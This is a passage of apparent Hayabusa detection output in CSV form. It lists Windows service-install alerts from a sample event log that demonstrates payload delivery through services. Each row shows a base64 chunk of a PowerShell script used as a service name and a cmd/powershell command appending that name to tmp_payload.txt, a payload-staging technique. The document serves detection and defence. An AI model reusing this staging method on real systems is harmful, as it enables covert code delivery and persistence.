AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:52.536 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:54.010 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:55.527 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:57.001 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KJERPTUFJTl9PUFQgPSAiRG9tYWluIg0KJExPQ0FMSE9TVF9PUFQgPSAiTG9jYWwgSG9zdCINCg0KDQpXcml0ZS1Mb2cgJElORk9fTE9HICJTdGFydGluZyBTY3JpcHQiDQoNCiMgRHJvcCBEb3du | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:58.464 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IE9wdGlvbnMNClthcnJheV0kQ29tcHV0ZXJMaXN0VHlwZU9wdGlvbnMgPSAkRklMRV9PUFQsICRMT0NBTEhPU1RfT1BULCAkRE9NQUlOX09QVA0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZhcmlhYm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:20:59.902 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xlcw0KJENvbXB1dGVyTGlzdFR5cGUgID0gR2V0LUlucHV0RnJvbURyb3BEb3duICRDb21wdXRlckxpc3RUeXBlT3B0aW9ucyAiSVAgTGlzdCBUeXBlIg0KDQoNCiNTZXQgdGhlIGZ1bmN0aW9uIHZh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:01.359 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cmlhYmxlcw0KV3JpdGUtTG9nICRJTlBVVF9MT0cgIlNlbGVjdCBDb21wdXRlciBMaXN0Li4uIg0KDQokQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbXB1dGVyTGlzdCAkQ29tcHV0ZXJMaXN0VHlwZQ0KJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:02.829 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: NvbXB1dGVyQ291bnQgPSAkQ29tcHV0ZXJMaXN0LkNvdW50DQokR2xvYmFsOkNyZWQgPSAkTnVsbA0KJEdsb2JhbDpDb25uZWN0aW9uSXNzdWVzID0gMCANCg0KI1NldCBhbGwgZXJyb3JzIHRvIHRl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:04.271 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cm1pbmF0aW5nDQokRXJyb3JBY3Rpb25QcmVmZXJlbmNlID0gIlN0b3AiDQoNCldyaXRlLUxvZyAkSU5GT19MT0cgIlNlbGVjdGVkOiAkQ29tcHV0ZXJMaXN0VHlwZSAoJENvbXB1dGVyQ291bnQgQ2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:05.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9tcHV0ZXIocykgRm91bmQpIg0KDQojQ2FsbCBmdW5jdGlvbg0KJFRpbWUgPSBNZWFzdXJlLUNvbW1hbmQgLUV4cHJlc3Npb24gew0KICAgICRMb2dSZXBvcnQgPSBFeHBvcnQtTG9nUmVwb3J0ICRD | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:07.159 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b21wdXRlcmxpc3QgJENvbXB1dGVyQ291bnQgJENvbXB1dGVyTGlzdFR5cGUNCn0NCg0KJFRpbWUgPSBbbWF0aF06OlJvdW5kKCRUaW1lLlRvdGFsTWludXRlcywgMSkNCg0KV3JpdGUtTG9nICRJTk | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:21:08.597 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZPX0xPRyAiRXZlbnQgTG9nIFJlcG9ydCBTdWNjZXNzZnVsbHkgQ2FsY3VsYXRlZCAmIEV4cG9ydGVkIC0gJENvbXB1dGVyQ291bnQgQ29tcHV0ZXJzIC0gJFRpbWUgTWludXRlcyAtICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
